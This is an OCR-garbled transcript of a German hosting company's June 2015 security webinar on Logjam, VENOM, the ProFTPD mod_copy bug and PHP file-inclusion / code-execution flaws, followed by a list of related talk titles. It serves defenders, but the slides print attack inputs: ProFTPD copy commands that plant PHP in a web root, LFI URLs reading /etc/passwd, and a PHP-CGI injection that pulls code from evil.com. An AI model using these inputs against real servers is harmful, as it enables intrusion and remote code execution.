Security-Webinar. Juni Dr. Christopher Kunz, filoo GmbH
|
|
- Lilli Hofer
- vor 7 Jahren
- Abrufe
Transkript
1 Security-Webinar Juni 2015 Dr. Christopher Kunz, filoo GmbH
2 Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hos7ng filoo GmbH / TK AG _ Promo7on IT Security _ Vorträge auf Konferenzen _ Autor von Ar7keln & Büchern _ Modera7on: Sibylle Blöchl _ Marke7ng Thomas- Krenn.AG _ Sammelt Fragen / Feedback
3 filoo GmbH _ Wir sind die Hos7ng- Tochter der Thomas- Krenn.AG _ Sicheres, hochperformantes Hos7ng in Frankfurt _ Mitarbeiter in Gütersloh und Freyung _ Primärer Rechenzentrumsstandort Frankfurt _ Tier3, ISO _ Fläche in zwei Brandabschni[en _ Managed Services _ Security Services _ Systemadministra7on _ Planung & Deployment
4 Agenda _ Security im April / Mai _ Logjam _ Venom _ ProFTPD- Server _ Web- Security Teil 2: LFI/RCE _ Was ist LFI, was RCE? _ Warum ist es gefährlich? _ (Wie) Kann ich es heilen?
5 Logjam-TLS-Problem _ Problem im Schlüsselaustausch (Diffie- Hellman) _ Ähnlich wie FREAK- Lücke _ Angreifer kann schlechte Verschlüsselung erzwingen _ Zu beheben über Konfigura7onsänderungen _ Mehr Info + Server- Test: _ h[ps://weakdh.org/sysadmin.html
6 VENOM _ Lücke in bekannten Virtualisierungsplaeormen _ KVM _ Xen _ Problem im Floppy- Disk- Treiber _ Ausbruch aus virtueller Maschine möglich _ Behoben in der filoo Cloud _ Natürlich auch in aktuellen Versionen von Xen/KVM
7 ProFTPD Security Bug _ Kopierbefehl in ProFTPD: CPFR, CPTO _ Kann von nicht authen7fizierten Nutzern ausgeführt werden _ Gefahr 1: Sensi7ve Daten kopieren/überschreiben _ CPFR /etc/passwd _ CPTO /tmp/passwd.woanders _ Gefahr 2: Code ausführen! _ site cpto <?php phpinfo();?> _ site cpfr /proc/self/fd/3 _ site cpto /var/www/test.php
8 ProFTPD Security Bug test.php: :01:13,159 slon-p5q proftpd[16255] slon-p5q (slon-p5q.lan[ ]): error rewinding scoreboard: Invalid argument :01:13,159 slon-p5q proftpd[16255] slon-p5q (slon-p5q.lan[ ]): FTP session opened :01:27,943 slon-p5q proftpd[16255] slon-p5q (slon-p5q.lan[ ]): error opening destination file '/<?php phpinfo();?>' for copying: Permission denied
9 ProFTPD Security Bug _ Angreifer rul nun auf: h[p:// /test.php _ Resultat: Ausführung beliebigen PHP- Codes _ Angreioar: Version _ Patches aller Distribu7onen exis7eren _ Alterna7ve: mod_copy.c deak7vieren (nicht laden)
10 Web Security 1: LFI/RCE _ Local File Inclusion _ Lokale Inklusion von Dateien _ Remote Code Execu7on _ Ausführung von Code aus der Ferne _ Angriff gegen Web- Server _ Funk7onsweise: Skriptcode (meist PHP) auf Server einschleusen und ausführen
11 Local File Inclusion _ Nachladen von Dateien, die nicht nachgeladen werden sollen _ Innerhalb von CGI- Skripten, PHP etc. _ Lokal hier: Auf dem Server _ Grund: Programmierfehler _ Z.B. beim Bau der Seitenlogik im Skript _ Oder beim Laden von Konfigura7on/Sprachdateien _ Auswirkungen _ Informa7ons- Lecks (Configfiles, Kundendaten, /etc/passwd) _ Code- Ausführung _ Denial of Service
12 Codebeispiel für LFI <?php include($_get[seitenname]..php );?> _ Variable für Seitenname kommt aus der URL _ h[p:// /x.php?seitenname=index _ h[p:// /x.php?seitenname=x _ Denial of Service (Endlosschleife) _ h[p:// /x.php?seitenname=/etc/passwd%00 _ Informa7onsleck _ Eigenen Code ausführen: Nicht trivial
13 Remote Code Execution _ ProFTPD- Bug ist ein RCE- Bug über Bande _ Eigentlich LFI _ Andere Möglichkeiten: SSH- Logfile, Mail- Log _ Königsdisziplin: Direkte Ausführung von Schadcode ohne lokale Dateien _ Ol eine Kombina7on von Lücken _ Häufig: Problem in einem Skript _ Fehlerhale Auswertungslogik
14 Angriffe mit RCE
15 Weevely _ Framework zum Ausnutzen von RCE- Bugs _ Interak7ve Shell auf PHP- Basis _ Benö7gt eine LFI/RCE Lücke _ Polymorphe Shell mit vielen Funk7onen
16 Weevely Screenshot/ Demo
17 Von LFI zu RCE _ LFI per proc- Dateisystem (PHP- CGI): h[p:// sicherheit.de/index.php?page=/proc/self/ environ (User- Agent auf <?php phpinfo()?> setzen _ h[p:// sicherheit.de/index.php? page=data:;base64,pd9wahagcghwaw5mbygpid8 Geht auch nur mit allow_url_include = On _ PHP- CGI Bug (CVE , behoben in 5.4.3/5.3.13) h[p:// sicherheit.de/?- d%20allow_url_include %3DOn+- d%20auto_prepend_file%3dh[p://evil.com/ code.txt%20- n
18 LFI / RCE verhindern _ Sauber programmieren _ Inklusion von Dateien aus User- Input vermeiden _ Administra7on prüfen _ Uploads von Dateien durch Nutzer beschränken _ Stets aktuelles PHP, Webserver, etc. nutzen
19 Vielen Dank _ Ich freue mich auf Ihre Themenvorschläge und Fragen! _ Kontaktdaten: _ E- Mail: chris@filoo.de _ Telefon: 05241/ _ Besuchen Sie filoo! _ h[ps:// _ h[p://twi[er.com/filoogmbh
Security-Webinar. Februar 2015. Dr. Christopher Kunz, filoo GmbH
Security-Webinar Februar 2015 Dr. Christopher Kunz, filoo GmbH Ihr Referent _ Dr. Christopher Kunz _ CEO Hos4ng filoo GmbH / TK AG _ Promo4on IT Security _ X.509 / SSL _ Vorträge auf Konferenzen _ OSDC
MehrSecurity-Webinar. April Dr. Christopher Kunz, filoo GmbH
Security-Webinar April 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hos7ng filoo GmbH / TK AG _ Promo7on IT Security _ Vorträge auf Konferenzen _ Autor
MehrSecurity-Webinar. Jahresrückblick. Dr. Christopher Kunz, filoo GmbH
Security-Webinar Jahresrückblick Dr. Christopher Kunz, filoo GmbH Ihr Referent _ Dr. Christopher Kunz _ CEO Hos4ng filoo GmbH / TK AG _ Promo4on IT Security _ X.509 / SSL _ Vorträge auf Konferenzen _ OSDC
MehrSecurity-Webinar. Juli Dr. Christopher Kunz, filoo GmbH
Security-Webinar Juli 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ 1 / 2 Geschäftsführer filoo GmbH _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor
MehrSecurity-Webinar. September Dr. Christopher Kunz, filoo GmbH
Security-Webinar September 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _
MehrSecurity-Webinar. März 2015. Dr. Christopher Kunz, filoo GmbH
Security-Webinar März 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hos7ng filoo GmbH / TK AG _ Promo7on IT Security _ Vorträge auf Konferenzen _ Autor von
MehrSecurity-Webinar. November Dr. Christopher Kunz, filoo GmbH
Security-Webinar November 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team Referent: Dr. Christopher Kunz 1 / 2 Geschäftsführer filoo GmbH Promotion IT Security Vorträge auf Konferenzen Autor von
MehrZweifaktor-Authentifizierung
Zweifaktor-Authentifizierung Juni 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen
MehrSecurity-Webinar. Dezember 2015. Dr. Christopher Kunz, filoo GmbH
Security-Webinar Dezember 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor
MehrSecurity-Webinar. März Dr. Christopher Kunz, filoo GmbH
Security-Webinar März 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor
MehrSecurity-Webinar. Mai Dr. Christopher Kunz, filoo GmbH
Security-Webinar Mai 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor
MehrSecurity-Webinar. August Dr. Christopher Kunz, filoo GmbH
Security-Webinar August 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor
MehrSecurity-Webinar. Januar Dr. Christopher Kunz, filoo GmbH
Security-Webinar Januar 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor
MehrSecurity-Webinar. November 2015. Dr. Christopher Kunz, filoo GmbH
Security-Webinar November 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor
MehrSSL-Zertifikate. Dr. Christopher Kunz
SSL-Zertifikate Dr. Christopher Kunz Ihr Referent _ Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ X.509 / SSL _ Vorträge auf Konferenzen _ OSDC 2012: SSL-Hacks _ OSDC
MehrGeoredundante RZ. Doppelt gemoppelt hält besser. Dr. Christopher Kunz, filoo GmbH
Georedundante RZ Doppelt gemoppelt hält besser Dr. Christopher Kunz, filoo GmbH Ihr Referent _Dr. Christopher Kunz _CEO Hosting filoo GmbH / TK AG _Promotion IT Security _ X.509 / SSL _Vorträge auf Konferenzen
MehrSecurity-Webinar. Dezember Dr. Christopher Kunz, filoo GmbH
Security-Webinar Dezember 2016 Dr. Christopher Kunz, filoo GmbH Über mich Dr. Christopher Kunz Geschäftsführer filoo GmbH Promotion IT Security Vorträge auf Konferenzen Autor von Artikeln & Büchern filoo
MehrSicheres Hosting in der Cloud. Dr. Christopher Kunz filoo GmbH
Sicheres Hosting in der Cloud Dr. Christopher Kunz filoo GmbH Organisatorisches _ Dieser Webcast wird aufgezeichnet _ Link zur Aufzeichnung per Mail _ Fragen bi;e im Chat stellen _ Ich antworte, wie es
MehrDem Hack keine Chance LAMP im Shared Hosting sicher betreiben
Dem Hack keine Chance LAMP im Shared Hosting sicher betreiben Heinlein Professional Linux Support GmbH Holger Uhlig h.uhlig@heinlein support.de Agenda: Prioritäten des Shared Hosting Selbstschutz Wo sind
MehrDem Hack keine Chance LAMP im Shared-Hosting sicher betreiben
Dem Hack keine Chance LAMP im Shared-Hosting sicher betreiben Heinlein Support GmbH Peer Heinlein Selbstschutz Wo sind meine Risiken? Haben wir Geheimnisse?.htaccess und.htpasswd
MehrUCS 2.4 Sicherheits-Update 3
UCS 2.4 Sicherheits-Update 3 Thema: Änderungen im Sicherheitsupdate 3 für UCS 2.4 Datum: 3. Mai 2011 Seitenzahl: 7 Versionsnummer: 8598 Autoren: Univention GmbH feedback@univention.de Univention GmbH Mary-Somerville-Straße
MehrWhen your browser turns against you Stealing local files
Information Security When your browser turns against you Stealing local files Eine Präsentation von Alexander Inführ whoami Alexander Inführ Information Security FH. St Pölten Internet Explorer Tester
Mehrsuhosin PHP-Patch und PHP-Security Extension Peter Prochaska - http://www.peter-prochaska.de
suhosin PHP-Patch und PHP-Security Extension Peter Prochaska Freiberuflicher Security-Consultant, PHP- Entwickler, Trainer und Autor. PHP-Entwickler seit 1998 Buchautor: PHP-Sicherheit, dpunkt.verlag Mitentwickler
MehrPHP-Sicherheit. Christopher Kunz kunz@rvs.uni-hannover.de. Regionales Rechenzentrum für Niedersachsen
PHP-Sicherheit Christopher Kunz kunz@rvs.uni-hannover.de Vorstellung PHP-Erfahrung seit 1999 Studium (M. Sc. Informatik) in Hannover Mitglied im Hardened-PHP Project URLs http://www.christopher-kunz.de/
MehrWebsites mit Dreamweaver MX und SSH ins Internet bringen
Websites mit Dreamweaver MX und SSH ins Internet bringen 1. Vorüberlegungen Dreamweaver stellt Funktionen bereit, um Websites im Internet zu veröffentlichen. Um diese Funktionen auf Servern des Rechenzentrums
MehrDatenbanken und Netzanbindung
Datenbanken und Netzanbindung Zusammenfassung von Michael Reiher zum Vortrag Webserver und Sicherheit. Meine Ausarbeitung befasst sicht sich mit Möglichkeiten eines Angriffs auf einen Webserver. Seite
MehrWebsecurity. Hochschule Darmstadt, Fachbereich Informatik, Sommersemester Christopher Dörge, Thomas Sauer, David Müller
Websecurity Hochschule Darmstadt, Fachbereich Informatik, Sommersemester 2017 Christopher Dörge, Thomas Sauer, David Müller Vorab ein Disclaimer Websecurity ist ein Dauerthema. Ständig werden neue Angriffspatterns
MehrTeil 1: CSWS Update, Konfiguration (Information von Hans Bachner,, HP Austria) CSWS im DECUSnet
Webserver unter OpenVMS Teil 1: CSWS Update, Konfiguration (Information von Hans Bachner,, HP Austria) Teil 2: Praktischer Einsatz des CSWS im DECUSnet DECUS München IT-Symposium 2004 Hotel Maritim,, Bonn,
MehrWeb Hacking - Angriffe und Abwehr
Web Hacking - Angriffe und Abwehr UNIX-Stammtisch 31. Januar 2012 Frank Richter Holger Trapp Technische Universität Chemnitz Universitätsrechenzentrum Motivation (1): Für uns Lehrveranstaltung: Techniken
MehrGrundlagen Internet-Technologien INF3171
Fachbereich Informatik Informationsdienste Grundlagen Internet-Technologien INF3171 Cookies & Sessions Version 1.0 20.06.2016 aktuelles 2 Erweiterungen wir betrachten zwei Erweiterungen: Personalisierung
MehrWeb 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte
Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript
MehrTypo3 - Schutz und Sicherheit - 07.11.07
Typo3 - Schutz und Sicherheit - 07.11.07 1 Angriffe auf Web-Anwendungen wie CMS oder Shop- Systeme durch zum Beispiel SQL Injection haben sich in den letzten Monaten zu einem Kernthema im Bereich IT- Sicherheit
MehrAktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn
Aktuelle Angriffstechniken Steffen Tröscher cirosec GmbH, Heilbronn Gliederung Angriffe auf Webanwendungen Theorie und Live Demonstrationen Schwachstellen Command Injection über File Inclusion Logische
MehrMagento Application Security. Anna Völkl / @rescueann
Magento Application Security Anna Völkl / @rescueann Anna Völkl @rescueann Magento Certified Developer PHP seit 2004 Magento seit 2011 IT & Telekommunikation (BSc), IT-Security (MSc) LimeSoda (Wien, AT)
MehrWeb Applications Vulnerabilities
Bull AG Wien Web Applications Vulnerabilities Philipp Schaumann Dipl. Physiker Bull AG, Wien www.bull.at/security Die Problematik Folie 2 Der Webserver ist das Tor zum Internet auch ein Firewall schützt
MehrOPENNEBULA ALS OPEN SOURCE CLOUD VIRTUALISIERUNGSLÖSUNG
OPENNEBULA ALS OPEN SOURCE CLOUD VIRTUALISIERUNGSLÖSUNG WEBINAR 05.03.2015 CHRISTIAN STEIN NETWAYS GMBH FLORIAN HETTENBACH THOMAS-KRENN AG REFERENTENVORSTELLUNG Christian Stein Account Manager Bei NETWAYS
MehrDatenschutztag. Eine Präsentation von Mateusz Gwara, Philipp Leder, Paul Panser und Patrick Wilke
Datenschutztag Eine Präsentation von Mateusz Gwara, Philipp Leder, Paul Panser und Patrick Wilke 1. Website Security Gliederung 2. Viren, Trojaner & Antivirensoftware 3. Phishing & Gefahren des World Wide
MehrApplica'on Performance Monitoring in der Oracle Cloud
Applica'on Performance Monitoring in der Oracle Cloud Marcus Schröder Master Principal Sales Consultant ORACLE Deutschland B.V. & Co. KG 16-Nov-2015 Copyright 2016, Oracle and/or its affiliates. All rights
MehrWEBINAR: HTTPS, ZERTIFIKATE, GRÜNE URLS. Trügerische Sicherheit im Internet
WEBINAR: HTTPS, ZERTIFIKATE, GRÜNE URLS Trügerische Sicherheit im Internet HERZLICH WILLKOMMEN Die Moderatoren Andreas Krenz Client Relationship Manager Fragen über Chat Frank Pöhler Senior Consultant
MehrGehackte Webapplikationen und Malware
2014-04-11 Vorstellung Beispiel Motivation Veraltete Webanwendungen Betreibe kleinen Webhoster (schokokeks.org), Fokus auf Datenschutz, Sicherheit, freie Software Zahlen: 2 Admins, ca. 300 Kunden, 1000
MehrSicheres Hosting in der Cloud. Jens Rehpöhler filoo GmbH
Sicheres Hosting in der Cloud Jens Rehpöhler filoo GmbH Organisatorisches _Dieser Webcast wird aufgezeichnet _Link zur Aufzeichnung per E-Mail _Organisatorin im Hintergrund nimmt Fragen entgegen _Umfrage
MehrWeb Application Testing: Wie erkenne ich, ob meine Website angreifbar ist?
Pallas Security Colloquium Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? 18.10.2011 Referent: Tim Kretschmann Senior System Engineer, CISO Pallas GmbH Hermülheimer Straße 8a
MehrPatch Management mit
Patch Management mit Installation von Hotfixes & Patches Inhaltsverzeichnis dieses Dokuments Einleitung...3 Wie man einen Patch installiert...4 Patch Installation unter UliCMS 7.x.x bis 8.x.x...4 Patch
MehrInhaltsverzeichnis. Inhaltsverzeichnis. Vorwort 9
Inhaltsverzeichnis Vorwort 9 1 Quickstart 11 1.1 Der Begriff XAMPP 12 1.2 Installation von XAMPP für Windows 14 1.3 Installation von XAMPP für Linux 17 1.4 Installation von XAMPP für Mac OS X 19 1.5 XAMPP
MehrPHP-5-Zertifizierung. Block 12 Security.
PHP-5-Zertifizierung Block 12 Security Allgemeine Regeln Alle Eingaben (von außen) sind (potenziell) böse Eingaben filtern/validieren Ausgaben escapen Trauen Sie nichts von außen! GET-/POST-Daten Cookies
MehrEinrichtung Secure-FTP
Einrichtung Secure-FTP ONEGroup Hochriesstrasse 16 83101 Rohrdorf Steffen Prochnow Hochriesstrasse 16 83101 Rohrdorf Tel.: (08032) 989 492 Fax.: (01212) 568 596 498 agb@onegroup.de 1. Vorwort... 2 2. Einrichtung
MehrErste Schritte. Eine Webseite erstellen. Erste Schritte Version 1
Erste Schritte In dieser Anleitung zeigen wir Ihnen, welche Schritte notwendig sind um eine Webseite bei uns in Betrieb zu nehmen. Exemplarisch wird dies mit Windows XP und den unter Windows verfügbaren
MehrUpgrade auf TYPO3 6.2
Upgrade auf TYPO3 6.2 Jochen Weiland Wolfgang Wagner TYPO3camp Berlin 2014! Fakten Kunden lieben LTS Versionen Die meisten Projekte laufen mit 4.5 Fakten 3.5 Jahre seit dem Release 4.5 34 Release seitdem
MehrChristopher Kunz Peter Prochaska. PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren. dpunkt.verlag
Christopher Kunz Peter Prochaska PHP-Sicherheit PHP/MySQL-Webanwendungen sicher programmieren dpunkt.verlag 1 Einleitung 1 1.1 Über dieses Buch 1 1.2 Was ist Sicherheit? 3 1.3 Wichtige Begriffe 4 1.4 Sicherheitskonzepte
MehrWorkbooster File Exchanger Command Line Tool
Thema Technische Benutzerdokumentation - WBFileExchanger Workbooster File Exchanger Command Line Tool Letzte Anpassung 18. Januar 2014 Status / Version Finale Version - V 1.1 Summary Erstellung Diese technische
MehrLinux-Camp: Linux als Server am Beispiel LAMP
Linux-Camp: Linux als Server am Beispiel LAMP Linux, Apache, MySQL, PHP mit Ubuntu Version 8.04 Inhalt LAMP-Komponenten LAMP-Komponenten installieren, konfigurieren und prüfen Apache Webserver PHP5 MySQL
MehrAngreifbarkeit von Webapplikationen
Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre
MehrPowershell DSC Oliver Ryf
1 Powershell DSC Oliver Ryf Partner: 2 Agenda Begrüssung Vorstellung Referent PowerShell Desired State Configuration F&A Weiterführende Kurse 3 Vorstellung Referent Seit 1991 IT-Trainer 1995 MCSE und MCT
MehrPHP-Security. Aleksander Paravac. watz@lug-bamberg.de http://www.lug-bamberg.de. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27
PHP-Security Aleksander Paravac watz@lug-bamberg.de http://www.lug-bamberg.de Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27 Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver
MehrGanz sicher sicher surfen. it-sa 2013 Nürnberg
Ganz sicher sicher surfen it-sa 2013 Nürnberg + Soforthilfe gegen kritische Reader-Lücken heise.de, 14.02.2013 Wer mit den aktuellen Versionen des Adobe Reader ein PDF-Dokument öffnet, läuft Gefahr, sich
MehrWie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab?
APEX aber sicher Wie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab? Carola Berzl BASEL BERN BRUGG GENF LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR.
MehrSecure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011
Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich
MehrÜber mich. Dem Hacker keine Chance Marc Nilius WordPress-Meetup Bonn
Über mich Diplom-Informatiker und selbständiger Web-Entwickler WordPress-Wartung und WordPress-Sicherheit @marcnilius oder @wpsicherheit https://www.wp-wartung24.de Co-Organizer diverser Meetups und WordCamps
MehrNeues aus dem DFN-CERT. 47. DFN-Betriebstagung - Forum Sicherheit 16. Oktober 2007 Andreas Bunten, DFN-CERT
Neues aus dem DFN-CERT 47. DFN-Betriebstagung - Forum Sicherheit 16. Oktober 2007 Andreas Bunten, DFN-CERT Veranstaltungen Tutorium DFN-PKI in der Praxis 22./23. Nov. 2007 in München (Ismaning) Telekom
MehrCopyright 2012, Oracle and/or its affiliates. All rights reserved.
Datenbankinstallation und Patching mit Cloud Control Ralf Durben Senior Principal Sales Consultant Copyright 2012, Oracle and/or its affiliates. All rights reserved. Agenda Grundlagen des Provisionings
MehrNEUIGKEITEN SAS 9.4 ARCHITEKTUR PHILLIP MANSCHEK
NEUIGKEITEN SAS 9.4 ARCHITEKTUR PHILLIP MANSCHEK HÄUFIGE FRAGEN Ist SAS 9.4 ein Update/Upgrade von/für SAS 9.3? Nein. Installation in ein separates SASHOME-Verzeichnis. Lassen sich SAS 9.3 und SAS 9.4
MehrTroubleshooting PHP Issues
Troubleshooting PHP Issues Jan Burkl System Engineer jan@zend.com Code Qualität und der Einfluss auf Entwicklungszeit und -kosten Quelle: Boehm und Papaccio Studie Fehlerhafter Code verbraucht typischerweise
MehrRoland Tilgner. Solution Architects & Team Coaching DEVELOPMENT. ORACLE TEXT AUS PL/SQL-SICHT Features und Möglichkeiten
Roland Tilgner Solution Architects & Team Coaching DEVELOPMENT ORACLE TEXT AUS PL/SQL-SICHT Features und Möglichkeiten ZURPERSON Roland Tilgner ZURFIRMA Roland Tilgner Solution Architects & Team Coaching
MehrCnlab / CSI 2011. Demo Smart-Phone: Ein tragbares Risiko?
Cnlab / CSI 2011 Demo Smart-Phone: Ein tragbares Risiko? Agenda Demo 45 Schutz der Smart-Phones: - Angriffsszenarien - «Jailbreak» - Was nützt die PIN? - Demo: Zugriff auf Passwörter iphone Bekannte Schwachstellen
MehrPowershell DSC Desired State Configuration
Ab der Powershell Version 4 wird DSC unterstützt. Ich nutze Windows 10 und habe es standardmäßig on Board. Vorbereitung: Download der individuell benötigten Module aus der Powershell Gallery https://www.powershellgallery.com/items
MehrPerl-Praxis. CGI-Skripte. Madis Rumming, Jan Krüger.
Perl-Praxis CGI-Skripte Madis Rumming, Jan Krüger {mrumming,jkrueger}@cebitec.uni-bielefeld.de Übersicht WWW, Web-Server CGI-Skripte Parameterübergabe Web-Formulare CGI.pm Perl-Praxis CGI-Skripte 2/16
MehrAnwendungen. Tom Vogt. <tom@lemuria.org>
Security Enhanced Linux Einführung Architektur Anwendungen Tom Vogt Der Autor beschäftigt sich seit ca. 10 Jahren mit Linux. hat an verschiedensten Free Software Projekten mitgearbeitet,
MehrZusammenfassung Web-Security-Check ZIELSYSTEM
Zusammenfassung Web-Security-Check ZIELSYSTEM für KUNDE (nachfolgend Auftraggeber genannt) von secudor GmbH Werner-von-Siemensstraße 6 Gebäude 9 86159 Augsburg (nachfolgend Auftragnehmer genannt) Inhalt
MehrOpenNebula. public and private cloud management.! Martin Alfke <martin.alfke@buero20.org>
public and private cloud management! Martin Alfke - Martin Alfke - Freelancer - Berlin/Germany Automation and Cfg Mgmt epost Development GmbH Migration von HW auf VM Umzug Bonn
MehrIML Deployment Axel Hahn 31.10.2013 zuletzt geändert: 04.04.2014
IML Deployment Axel Hahn 31.10.2013 zuletzt geändert: 04.04.2014 Agenda Einleitung, Ausgangslage Build- Prozess, Hooks Phasen + Workflow Handling der KonfiguraHonsdateien InstallaHon mit Puppet Ablage
MehrGrundlagen der Web-Sicherheit
Grundlagen der Web-Sicherheit Das Labor e.v. 29.05.2008 Johannes Dahse, Felix Gröbert johannesdahse@gmx.de, felix@groebert.org creativecommons.org/licenses/by-nc-nd/2.0/de pwn pwn pwn...!"#$%&'($)*+,-&../%
MehrMultimedia im Netz. Wintersemester 2011/12. Übung 10. Betreuer: Verantwortlicher Professor: Sebastian Löhmann. Prof. Dr.
Multimedia im Netz Wintersemester 2011/12 Übung 10 Betreuer: Verantwortlicher Professor: Sebastian Löhmann Prof. Dr. Heinrich Hussmann Organisatorisches 2 Gesundes neues Jahr 3 Blatt 08 Videoformate im
MehrMEHR KONTROLLE, MEHR SICHERHEIT. Business Suite
MEHR KONTROLLE, MEHR SICHERHEIT Business Suite 2 ENDGERÄTESCHUTZ - DAS HERZSTÜCK DER CYBER SECURITY Cyber-Angriffe treten immer häufiger auf und werden dabei stets ausgefeilter. Jedes Unternehmen kann
MehrDomino und PHP EC 2013 Track 2 Session 7
Domino und PHP EC 2013 Track 2 Session 7 1 Domino und PHP Worum es heute geht Überblick über die verschiedenen Methoden Installation Allerlei Beispiele und Ideen Worum es nicht geht LotusScript, PHP (Sie
MehrSicherheit wird messbar Lösungsansätze und Methoden. Email Case. 15. September 2009, Hotel St. Gotthard, Zürich
Sicherheit wird messbar Lösungsansätze und Methoden Email Case 15. September 2009, Hotel St. Gotthard, Zürich ActiveSync Div. Email Landschaft PeerToPeer -USB -Bluetooth Smart phone Netzwerk - Ethernet
MehrRequirements basiertes Testen mit JUnit Architektur für eine Verbindung von Requirements Management und Test Management
Requirements basiertes Testen mit JUnit Architektur für eine Verbindung von Requirements Management und Test Management Oliver Böhm MKS GmbH Agenda Architektur und Umsetzung MKS Integrity MKS Requirements
MehrEinrichtung der Datenbank und Front-End Software
Schule als Staat EDV-System Einrichtung der Datenbank und Front-End Software Letzte Änderungen: 26.11.2017 1 Inhalt 1 Einführung... 3 1.1 Systemanforderungen... 3 1.2 Wissensanforderungen... 3 2 Setup...
MehrNetzwerksicherheit Übung 9 Websicherheit
Netzwerksicherheit Übung 9 Websicherheit David Eckhoff, Tobias Limmer, Christoph Sommer Computer Networks and Communication Systems Dept. of Computer Science, University of Erlangen-Nuremberg, Germany
MehrNext Generation Server Protection
Next Generation Server Protection Ransomware-Schutz, automatisches Whitelisting und Synchronized Security Michael Veit Technology Evangelist Server-Schutz der nächsten Generation Wer ist Sophos? Automatisches
MehrMigra?on VMWare basierender Datenbanken auf Knopfdruck
Migra?on VMWare basierender Datenbanken auf Knopfdruck Oracle Ravello Cloud Service Marcus Schröder Master Principal Sales Consultant Business Unit Core & Cloud Technologies Oracle Deutschland Copyright
MehrExploits & Rootkits. Betriebssystemdienste & -administration Seminar. Betriebssysteme und Middleware. Sebastian.Roschke@hpi.uni-potsdam.
Exploits & Rootkits Betriebssystemdienste & -administration Seminar Betriebssysteme und Middleware Sebastian.Roschke@hpi.uni-potsdam.de Steffen.Ryll@hpi.uni-potsdam.de Steffen Ryll & Sebastian Roschke
MehrSECURE BROWSING ELIMINIEREN SIE BEDROHUNG DURCH RANSOMWARE ATTACKEN. Florian Eller CEO Ruf Avatech AG Andreas Tischer CTO Ruf Avatech AG
SECURE BROWSING ELIMINIEREN SIE BEDROHUNG DURCH RANSOMWARE ATTACKEN Florian Eller CEO Ruf Avatech AG Andreas Tischer CTO Ruf Avatech AG 3 4 Ein kurzer Rückblick was ist passiert? 5 INFEKTION - Schadcode
MehrUCS 2.3 Sicherheits-Update 4
UCS 2.3 Sicherheits-Update 4 Thema: Änderungen im Sicherheitsupdate 4 für UCS 2.3 Datum: 1. Juli 2010 Seitenzahl: 11 Versionsnummer: 5768 Autoren: Univention GmbH feedback@univention.de Univention GmbH
MehrPlay with Ansible - Provisioning von Weblogic mit Ansible
Play with Ansible - Provisioning von Weblogic mit Ansible Bio Thorsten Wussow 20 Jahre IT davon 16 Jahre mit Oracle thorsten@slix.de Twitter: @thwussi 2 Agenda Einleitung Ansible Allgemein Ansible für
MehrScripting Framework PowerShell Toolkit Quick-Install a Workplace for Packaging and Test
Scripting Framework PowerShell Toolkit Quick-Install a Workplace for Packaging and Test Windows Client Management AG Alte Haslenstrasse 5 CH-9053 Teufen wincm.ch 1 Quick Install - Scripting Framework Workplace...3
MehrRIPS. Automatisierte Schwachstellenerkennung in PHP-Software mittels statischer Quellcode-Analyse. BSI - 12. Deutscher IT-Sicherheitskongress
